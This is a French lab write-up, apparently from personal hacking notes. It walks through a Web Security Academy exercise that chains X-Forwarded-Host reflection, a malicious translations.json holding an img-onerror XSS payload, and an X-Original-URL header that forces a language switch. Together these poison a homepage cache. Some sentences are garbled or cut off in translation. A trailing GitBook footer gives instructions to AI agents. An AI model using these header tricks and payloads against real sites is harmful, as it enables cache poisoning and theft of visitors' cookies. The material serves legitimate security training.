> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/cache-poisoning/combination-of-web-vulnerabilities-cache-poisoning.md).

# Combinaison de vulnérabilités web d’empoisonnement du cache

### Combinaison de vulnérabilités d’empoisonnement du cache Web

Nous devons **empoisonner le cache de la page d’accueil** avec une version qui s’exécute **`alert(document.cookie)`** dans le navigateur du visiteur. La victime transmet `/` about **toutes les minutes** et **la langue de la victime est l’anglais (`lang=en` cookie)**.

<figure><img src="/files/98cb35242a824913481d4dc0438975a1166c75fa" alt=""><figcaption></figcaption></figure>

### (1) Point d’entrée : fonctionnalité de traduction côté client

Sur la page d’accueil, nous observons :

* Un `lang` cookie (par exemple, `lang=es`) + `session=...`
* Un script de traduction : **`/resources/js/translations.js`**

{% code overflow="wrap" %}

```http
Cookie: lang=es; session=3AJsSQlcvMWoyYAD7DAbxUISdsu1rIFg
```

{% endcode %}

```javascript
function initTranslations(jsonUrl)
{
    const lang = document.cookie.split(';')
        .map(c => c.trim().split('='))
        .filter(p => p[0] === 'lang')
        .map(p => p[1])
        .find(() => true);

    const translate = (dict, el) => {
        for (const k in dict) {
            if (el.innerHTML === k) {
                el.innerHTML = dict[k];
            } else {
                el.childNodes.forEach(el_ => translate(dict, el_));
            }
        }
    }

    fetch(jsonUrl)
        .then(r => r.json())
        .then(j => {
            const select = document.getElementById('lang-select');
            if (select) {
                for (const code in j) {
                    const name = j[code].name;
                    const el = document.createElement("option");
                    el.setAttribute("value", code);
                    el.innerText = name;
                    select.appendChild(el);
                    if (code === lang) {
                        select.selectedIndex = select.childElementCount - 1;
                    }
                }
            }

            lang in j && lang.toLowerCase() !== 'en' && j[lang].translations && translate(j[lang].translations, document.getElementsByClassName('maincontainer')[0]);
        });
}
```

Ce script lit `lang` à partir des cookies, puis effectue une `fetch()` vers un JSON :

```json
{
    "en": {
        "name": "Anglais"
    },
    "es": {
        "name": "Espagnol",
        "translations": {
            "Retour à la liste": "Retour à la liste",
            "Voir les détails": "Voir les détails",
            "Description :": "Description :"
        }
    },
    "cn": {
        "name": "Chinois",
        "translations": {
            "Retour à la liste": "Retour à la liste",
            "Voir les détails": "Voir les détails",
            "Description :": "Description :"
        }
    },
    "ar": {
        "name": "Arabe",
        "translations": {
            "Retour à la liste": "Retour à la liste",
            "Voir les détails": "Voir les détails",
            "Description :": "Description :"
        }
    },
    "en-gb": {
        "name": "Anglais correct",
        "translations": {
            "Retour à la liste": "D’où vous venez",
            "Voir les détails": "Faites-moi l’honneur d’élaborer",
            "Description :": "Pontifications sur le sujet :"
        }
    },
    "ml": {
        "name": "Malayalam",
        "translations": {
            "Retour à la liste": "Retour à la liste",
            "Voir les détails": "Voir les détails",
            "Description :": "Description :"
        }
    },
    "hb": {
        "name": "Hébreu",
        "translations": {
            "Retour à la liste": "Retour à la liste",
            "Voir les détails": "Voir les détails",
            "Description :": "Description :"
        }
    },
    "zl": {
        "name": "Ẕ̻͕̿̊ͤ̍ͅa͙l̗ͧg̮̤̰̘͇ȍ͇͕̳̙͙͉́̅̋̌̅",
        "translations": {
            "Retour à la liste": "Re̹̰̘͉̹̪ͅt̬̫̜ȕͩ͒ͥͥr̃̉͒n ̎͂t͎͖̽͋o͖̟͚͙̲͐ͤͫ̎̓ ̼̟͈̭͉͎̂ͯ̔ͤͤ̏͐ͅliͤ͑ͧ̆̐̈̀sṭ̠̮̰͍̙͒̔͆̈ͤ̅",
            "Voir les détails": "V̖̮͙ͅi͇e͙̦w̭̣̫͇̦̬̰ ̓͑̓ͯ̔d͍͂e͚̮͖͍͖̠͙ͮͭ̉ͦ̏͌̆t̙͎̺͉a̳̖͔̱͉̱͑̆̌̃͊ͬi̯͚͙̼̹̮l̖͎͛̈́͒ͅs̒̒ͤ̽̒̀",
            "Description :": "D̳͔e̝ͩ̐ͅsc̗̱̼̤̬̎̓ͪͣͭ̐ͅr̪̝͖̙̱̄̓͌̓̚ip̭̦̭̰̻ͣ̓̽ͨ̚ț̤̝̻i̹̱̟̞͕̓̓ͬ̓ͬ̆ͅon̠͚͕̈́̋̓:"
        }
    },
    "fn": {
        "name": "Finnois",
        "translations": {
            "Retour à la liste": "Retour à la liste",
            "Voir les détails": "Voir les détails",
            "Description :": "Description :"
        }
    },
    "hw": {
        "name": "Hawaïen",
        "translations": {
            "Retour à la liste": "Retour à la liste",
            "Voir les détails": "Voir les détails",
            "Description :": "Description :"
        }
    },
    "mm": {
        "name": "Birman",
        "translations": {
            "Retour à la liste": "Retour à la liste",
            "Voir les détails": "Voir les détails",
            "Description :": "Description :"
        }
    }
}
```

Et `data.host` provient d’un bloc en ligne sur la page d’accueil :

```http
<script>
     data = {"host":"0acc008b046bd245809803b8002b0061.web-security-academy.net","path":"/"}
</script>
```

Ensuite, le script applique les traductions en remplaçant le texte via `innerHTML`, ce qui est important car cela peut transformer une traduction en \*\*injection HTML\*\* si vous contrôlez le JSON.

### Vulnérabilité n°1 : manipulation de l’hôte via `X-Forwarded-Host`

En ajoutant l’en-tête HTTP suivant

```http
X-Forwarded-Host: test.com
```

nous constatons que la valeur est reflétée dans `data.host`.

<figure><img src="/files/32d584744cb4fa51e7829906fbbb52b201337258" alt=""><figcaption></figcaption></figure>

```javascript
<script>
    initTranslations('//' + data.host + '/resources/json/translations.json');
</script>
```

<figure><img src="/files/ea7a82028347cf47fe1cad3a62562a7b03cc1fdd" alt=""><figcaption></figcaption></figure>

Nous pouvons donc forcer le navigateur à charger le fichier :

```bash
/resources/json/translations.json
```

### 3. Vulnérabilité n°2 : XSS via le fichier JSON de traduction

Nous hébergeons sur le serveur d’exploitation un faux `translations.json` contenant une injection XSS dans une traduction, par exemple :

```json
{
    "en": {
        "name": "Anglais"
    },
    "es": {
        "name": "Espagnol",
        "translations": {
            "Retour à la liste": "Bonjour",
            "Voir les détails": ""></a><img src=0 onerror=alert(document.cookie)>",
            "Description :": "Description :"
        }
    }
}
```

<figure><img src="/files/785c44f8fbc2c9066cc05f6d0be72d1eaee51907" alt=""><figcaption></figcaption></figure>

Nous utilisons ensuite :

```http
X-Forwarded-Host: exploit-0a19004104f2d29e80b40256011c00b0.exploit-server.net/
```

La page d’accueil, servie depuis le cache, pointera désormais vers notre fichier JSON malveillant.

Le contenu de la traduction est donc interprété comme du HTML, ce qui permet l’exécution du JavaScript injecté.

<figure><img src="/files/0b063080140fd7ef46b379cca54f06be2c45fe02" alt=""><figcaption></figcaption></figure>

### 4. Limitation : la victime utilise l’anglais

Le script de traduction ne s’exécute que si :

* `lang !== 'en'`

La victime, au départ `lang=en`. / Même si nous contrôlons le fichier JSON, \*\*l

Nous devons donc **renforcer le passage en espagnol**.

### 5. Vulnérabilité n°3 : forcer le changement de langue via `X-Original-URL`

<figure><img src="/files/3d44b1e36e3da4cf50b5afa2b618d31b4660a227" alt=""><figcaption></figcaption></figure>

En utilisant Param Miner, nous identifions l’en-tête vulnérable :

```http
X-Original-Url: /test
```

Nous envoyons une autre requête à `/` avec :

* `X-Original-URL: /test` → `404 Not Found`

<figure><img src="/files/425b168624948e141161d1f05f564379f18dd894" alt=""><figcaption></figcaption></figure>

Le cache renvoie une réponse qui définit `lang=es` pour les visiteurs.

```http
X-Original-Url: /setlang/es
```

`X-Original-URL: /setlang/es` → `302 Found`

Cette voie :

* Définit le `lang=es` cookie
* Puis retournez à la page d’accueil

<figure><img src="/files/8f44f102ace0cd0db71eb533f3ddab058496d3f5" alt=""><figcaption></figcaption></figure>

#### Exécution du payload chez la victime

1. La victime visite `/`
2. `lang` le cookie est envoyé à `es`
3. La page recharge le `translations.json` fichier depuis notre serveur d’exploitation
4. La traduction malveillante est injectée dans le DOM
5. Le navigateur exécute :

<figure><img src="/files/cd4a6c17a57b3b32df494f4279e081898210ff7d" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/cache-poisoning/combination-of-web-vulnerabilities-cache-poisoning.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
